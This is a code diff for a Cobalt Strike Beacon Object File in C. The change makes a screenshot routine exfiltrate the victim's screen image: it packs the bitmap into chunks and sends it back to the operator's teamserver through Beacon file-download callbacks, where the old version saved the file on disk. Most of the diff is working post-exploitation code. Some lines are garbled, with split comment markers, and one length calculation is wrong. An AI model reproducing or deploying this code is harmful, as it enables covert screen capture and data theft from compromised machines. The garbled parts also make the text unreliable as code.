skipped 4 lines 5 5 #pragma comment(lib, "User32.lib") 6 6 #pragma comment(lib, "Gdi32.lib") 7 7 8 + char downloadfilename[] = "screenshot.bmp"; 9 + /*Download File*/ 10 + void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) { 8 11 12 + //Intializes random number generator to create fileId 13 + time_t t; 14 + MSVCRT$srand((unsigned)MSVCRT$time(&t)); 15 + int fileId = MSVCRT$rand(); 16 + 17 + //8 bytes for fileId and fileSize 18 + int messageLength = downloadFileNameLength + 8; 19 + char* packedData = (char*)MSVCRT$malloc(messageLength); 20 + 21 + //pack on fileId as 4-byte int first 22 + packedData[0] = (fileId >> 24) & 0xFF; 23 + packedData[1] = (fileId >> 16) & 0xFF; 24 + packedData[2] = (fileId >> 8) & 0xFF; 25 + packedData[3] = fileId & 0xFF; 26 + 27 + //pack on fileSize as 4-byte int second 28 + packedData[4] = (fileSize >> 24) & 0xFF; 29 + packedData[5] = (fileSize >> 16) & 0xFF; 30 + packedData[6] = (fileSize >> 8) & 0xFF; 31 + packedData[7] = fileSize & 0xFF; 32 + 33 + int packedIndex = 8; 34 + 35 + //pack on the file name last 36 + for (int i = 0; i < downloadFileNameLength; i++) { 37 + packedData[packedIndex] = fileName[i]; 38 + packedIndex++; 39 + } 40 + 41 + BeaconOutput(CALLBACK_FILE, packedData, messageLength); 42 + 43 + if (fileSize > (1024 * 900)) { 44 + 45 + //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk) 46 + int numOfChunks = (fileSize / (1024 * 900)) + 1; 47 + int index = 0; 48 + int chunkSize = 1024 * 900; 49 + 50 + while (index < fileSize) { 51 + if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on 52 + 53 + /*First 4 are the fileId 54 + then account for length of file 55 + then a byte for the good-measure null byte to be included 56 + then lastly is the 4-byte int of the fileSize*/ 57 + int chunkLength = 4 + chunkSize; 58 + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); 59 + 60 + //pack on fileId as 4-byte int first 61 + packedChunk[0] = (fileId >> 24) & 0xFF; 62 + packedChunk[1] = (fileId >> 16) & 0xFF; 63 + packedChunk[2] = (fileId >> 8) & 0xFF; 64 + packedChunk[3] = fileId & 0xFF; 65 + 66 + int chunkIndex = 4; 67 + 68 + //pack on the file name last 69 + for (int i = index; i < index + chunkSize; i++) { 70 + packedChunk[chunkIndex] = returnData[i]; 71 + chunkIndex++; 72 + } 73 + 74 + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 75 + 76 + } 77 + else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements 78 + 79 + int lastChunkLength = fileSize - index + 4; 80 + char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength); 81 + 82 + //pack on fileId as 4-byte int first 83 + lastChunk[0] = (fileId >> 24) & 0xFF; 84 + lastChunk[1] = (fileId >> 16) & 0xFF; 85 + lastChunk[2] = (fileId >> 8) & 0xFF; 86 + lastChunk[3] = fileId & 0xFF; 87 + int lastChunkIndex = 4; 88 + 89 + //pack on the file name last 90 + for (int i = index; i < fileSize; i++) { 91 + lastChunk[lastChunkIndex] = returnData[i]; 92 + lastChunkIndex++; 93 + } 94 + BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); 95 + } 96 + 97 + index = index + chunkSize; 98 + 99 + } 100 + 101 + } 102 + else { 103 + 104 + /*first 4 are the fileId 105 + then account for length of file 106 + then a byte for the good-measure null byte to be included 107 + then lastly is the 4-byte int of the fileSize*/ 108 + int chunkLength = 4 + fileSize; 109 + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); 110 + 111 + //pack on fileId as 4-byte int first 112 + packedChunk[0] = (fileId >> 24) & 0xFF; 113 + packedChunk[1] = (fileId >> 16) & 0xFF; 114 + packedChunk[2] = (fileId >> 8) & 0xFF; 115 + packedChunk[3] = fileId & 0xFF; 116 + int chunkIndex = 4; 117 + 118 + //pack on the file name last 119 + for (int i = 0; i < fileSize; i++) { 120 + packedChunk[chunkIndex] = returnData[i]; 121 + chunkIndex++; 122 + } 123 + 124 + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 125 + } 126 + 127 + 128 + //We need to tell the teamserver that we are done writing to this fileId 129 + char packedClose[4]; 130 + 131 + //pack on fileId as 4-byte int first 132 + packedClose[0] = (fileId >> 24) & 0xFF; 133 + packedClose[1] = (fileId >> 16) & 0xFF; 134 + packedClose[2] = (fileId >> 8) & 0xFF; 135 + packedClose[3] = fileId & 0xFF; 136 + BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4); 137 + 138 + return; 139 + } 9 140 10 141 #pragma region error_handling 11 142 #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) skipped 68 lines 80 211 ReleaseDC(NULL, hDC); 81 212 } 82 213 83 - fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 84 - FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); 214 + / / fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN , NULL ) ; 85 215 86 - if (fh == INVALID_HANDLE_VALUE) 87 - return FALSE; 216 + / / if (fh == INVALID_HANDLE_VALUE) 217 + / / return FALSE; 88 218 89 219 bmfHdr.bfType = 0x4D42; // "BM" 90 220 dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; skipped 1 lines 92 222 bmfHdr.bfReserved1 = 0; 93 223 bmfHdr.bfReserved2 = 0; 94 224 bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; 225 + void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize); 226 + memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER)); 227 + memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize); 95 228 96 - WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); 97 229 98 - WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); 230 + downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize)); 231 + //WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL); 232 + 233 + /* clean up */ 99 234 GlobalUnlock(hDib); 100 235 GlobalFree(hDib); 101 - CloseHandle(fh); 236 + / / CloseHandle(fh); 102 237 return TRUE; 103 238 } 104 239 105 240 #ifdef BOF 106 241 void go(char* buff, int len) { 107 - BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); 242 + datap parser; 243 + char * downloadfilename; 244 + BeaconDataParse(&parser, buff, len); 245 + downloadfilename = BeaconDataExtract(&parser, NULL); 246 + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename); 108 247 int x1, y1, x2, y2, w, h; 109 248 // get screen dimensions 110 249 x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); skipped 21 lines 132 271 */ 133 272 134 273 BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); 135 - LPCSTR filename = "screenshot.bmp"; 274 + LPCSTR filename = (LPCSTR)downloadfilename; 136 275 SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); 137 276 138 - BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot . bmp "); 277 + / / BeaconPrintf(0x0, "[+] Printscreen bitmap saved to % s ", downloadfilename ); 139 278 // clean up 140 279 SelectObject(hDC, old_obj); 141 280 DeleteDC(hDC); skipped 12 lines